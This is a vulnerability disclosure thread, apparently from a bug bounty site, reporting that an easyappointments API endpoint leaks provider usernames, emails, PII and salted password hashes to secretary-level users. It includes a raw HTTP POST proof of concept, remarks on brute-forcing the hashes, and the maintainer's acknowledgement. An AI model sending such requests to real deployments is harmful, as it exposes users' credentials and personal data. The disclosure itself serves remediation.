Account Takeover in alextselegidis/easyappointments
Reported on
May 11th 2022
Description
In this case i found that api endpoint Leaking password and username.
Proof of Concept
- An Admin add a new secretary with access to providers
- Secretary send a post request to https://demo.easyappointments.org/index.php/backend_api/ajax_get_calendar_appointments endpoint
- If selected provider does not have any appointment then it will return blank response else we will receive response with username email and password of selected provider
- Now even if provider does not have any appointment a secretary can create a new appointment in which secretary will receive username and password (password in hash format)
// PoC.js As Secretary send a post request to
POST /index.php/backend_api/ajax_get_calendar_appointments HTTP/1.1
Host: demo.easyappointments.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 118
Origin: https://demo.easyappointments.org
DNT: 1
Connection: keep-alive
Referer: https://demo.easyappointments.org/index.php/backend
Cookie: csrfCookie=94313c542d7e676eafd5ea15c6925c73; ea_session=tcsbtn08c5bqfh718opvjur7imeqvaag
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Impact
Account takeover
Hello! Thanks for posting this.
I can replicate the issue and agree this data should not be visible.
On the other side this is only something a logged in user may see and the password is hashed.
The upcoming 1.5 release will hide the password from the provider payload.
hi i want to know how you calculated severity ?? Since we dont need user's interaction, we require low privileges as user , so i think high severity is appropriate for this report. Can You please take a look of this things.
Hi i also want to mention that this endpoint also show PII (Personally Identifiable Information) of the user including phone number email address and address of user + google token and also we got hash and salt of the encrypted password so even simple brute force attack using that hash and salt use will help to crack password easily. As PII disclosure alone has P2 High severity i think this report should have to considered as high severity
Hi @admin can you please help us to determine severity of this issue.
@gaurav-g2 - it is up to the maintainer how severe they think the security issue to be. We try not to take a position on this as we believe the maintainer is best placed to make this assessment. I would recommend waiting to hear back from the maintainer and continue a respectful dialogue about the impact of the vulnerability 👍